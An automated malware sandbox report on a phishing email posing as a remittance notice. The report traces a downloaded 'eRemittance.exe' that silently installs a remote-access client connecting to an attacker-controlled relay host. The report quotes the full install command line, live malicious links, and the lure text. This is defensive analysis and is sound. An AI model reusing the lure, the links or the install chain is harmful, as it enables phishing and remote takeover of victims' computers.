Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 5876	Thread sleep count: 39 > 30
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 640	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Downloads\eRemittance.exe

Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Process information queried: ProcessInformation

Source: C:\Users\user\Downloads\eRemittance.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Source: C:\Users\user\Downloads\eRemittance.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Downloads\eRemittance.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv&c=&c=update&c=&c=&c=&c=&c=&c="

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Users\user\Downloads\eRemittance.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.Core.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Modifies security policies related information

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

Source: Yara match	File source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, type: DROPPED
Source: Yara match	File source: 0000000D.00000002.1465099103.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.1499986556.0000000000AF2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1470052005.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1442769522.0000000000936000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1458252749.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\49dfbf.rbs, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSIE21F.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match	File source: 00000015.00000002.2498905500.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Windows Management Instrumentation	1 Component Object Model Hijacking	1 Component Object Model Hijacking	22 Masquerading	OS Credential Dumping	13 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	2 Windows Service	2 Windows Service	21 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Browser Extensions	11 Process Injection	51 Virtualization/Sandbox Evasion	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	11 Process Injection	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 DLL Side-Loading	1 DLL Side-Loading	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Extra Window Memory Injection	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Source	Detection	Scanner	Label
C:\Users\user\Downloads\Unconfirmed 376437.crdownload	18%	ReversingLabs	Win32.PUA.ConnectWise
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dll	0%	ReversingLabs
C:\Windows\Installer\MSIE23F.tmp	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	3.5.28.195	true	false	high
bitbucket.org	185.166.143.48	true	false	high
bahraincv.com	192.254.226.219	true	false	unknown
slplegalfinance.com	185.143.228.176	true	false	high
clicktime.cloud.postoffice.net	165.212.65.140	true	false	high
fub.direct	18.172.112.30	true	false	high
www.google.com	142.250.185.68	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.113.194.132	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
142.250.186.174	unknown	United States	15169	GOOGLEUS	false
18.172.112.30	fub.direct	United States	3	MIT-GATEWAYSUS	false
142.251.173.84	unknown	United States	15169	GOOGLEUS	false
165.212.65.140	clicktime.cloud.postoffice.net	United States	14454	PERIMETER-ESECURITYUS	false
185.143.228.176	slplegalfinance.com	Germany	61317	ASDETUKhttpwwwheficedcomGB	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.174	unknown	United States	15169	GOOGLEUS	false
185.166.143.48	bitbucket.org	Germany	16509	AMAZON-02US	false
142.250.185.131	unknown	United States	15169	GOOGLEUS	false
52.109.28.46	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.254.226.219	bahraincv.com	United States	46606	UNIFIEDLAYER-AS-1US	false
3.5.28.195	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
20.42.73.31	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.16.131	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1593855
Start date and time:	2025-01-17 18:45:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
Detection:	MAL
Classification:	mal84.evad.winEML@45/54@14/141
Cookbook Comments:	Found application associated with file extension: .eml

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 172.217.16.131, 142.250.185.174, 142.251.173.84, 142.250.184.238, 142.250.186.46, 20.42.73.31, 216.58.206.78
Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, prod.configsvc1.live.com.akadns.net, clientservices.googleapis.com, s-0005-office.config.skype.com, onedscolprdeus21.eastus.cloudapp.azure.com, mobile.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, clients2.google.com, redirector.gvt1.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, clients.l.google.com, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.live.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: bahraincv.com

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "explanation": [ "The email contains multiple suspicious redirect links through clicktime.cloud.postoffice.net pointing to potentially malicious domains", "The subject line and content follow common phishing patterns mentioning 'remittance' and 'eDocument' to create urgency", "The sender's domain doesn't match the service desk contact information and social media links included in the footer" ], "phishing": true, "confidence": 9, "generated_by_ai": false }
{ "date": "Thu, 16 Jan 2025 04:57:06 -0800", "subject": "Completed: Please Review Remittance eDocument_PrintScan_1962.pdf", "communications": [ "[EXTERNAL EMAIL: Take caution with links and attachments. ] \n\n\n \n\nYour eDocument is ready.\n\n\nHi user,\n\nPlease find remittance for the payment processed on January 16, 2024 \nby clicking this button:\n\nReview Document <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0> \n\n\n\nOr copy/paste this link to your browser: \n\n\n________________________________\n\nQuestions? Simply reply to this email.\n\n{udomain} Service Desk \| 1-888-250-8971 <tel:1-888-250-8971> \| [email} \| Twitter <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.OwzZc87aARPCaEzPsO5TaRb9yVbN1LzKEIQlDyEjylkVPzMYc3hK1lyhY9U9JnsQI-3O_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNI2A4KlXhqqJBCUplnq34p-2FcBNm2geGffl0AeKkj3nzkX-2By-2F7ULa0U98312nMznQrHBcReplzwLpk1ZEKg93MJ90rVAf4Auq3iaqEZmipp7VgYfvFD4Lq9BuZBkITnFjQ52ZbFtcU9lGu5yWcy1MQp&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=916f0593958ddb61a38518ccb443ae58be2b8c31> \| Facebook <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkg09RC6nUlgZPSzVUHUPncyB3NtX3MkMm6cz-2B4VhiW2Uz3FY_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNk-2BEx2PFei6Rl1NW4O5lSAs95M04Llyfi4dru2VAxx8RxdYgvoA1i8KQGE6SX7mKuv2BbmON5xM2azf8weVYwVmEeZZbEBPxZHvi9R3eC0drcXGnQpX18UaTfqh5K8sLUZlFugtBPI4YC-2BuolKdQT7&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=c49349e144376cc635ca69cc18b09078cd1ac29e> \| Blog <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.Mx4SSLZxEU2WaKO7j3r6LAnl1AejIR76oSNxAG2MeUyfzCWuK-2BZ1VvUF1Zc5pE6aoNrF_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPYPIBJGHD22nct74mjZumCFJIP-2FvqcMfn9Np5sERDWNN6YE8VjBGUKN2td2HYXP6v0o3puyUErhuDXEGXIcZY9U-2BJnRFtRI0v7PzATd-2ByLAlcKcASOLRrTIj2fnKKjMe9thkaXkoumqaX5s-2F4r4z3Z&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=31c5b18d17575c0bd4e5219f82d813a92eb63209> \| LinkedIn 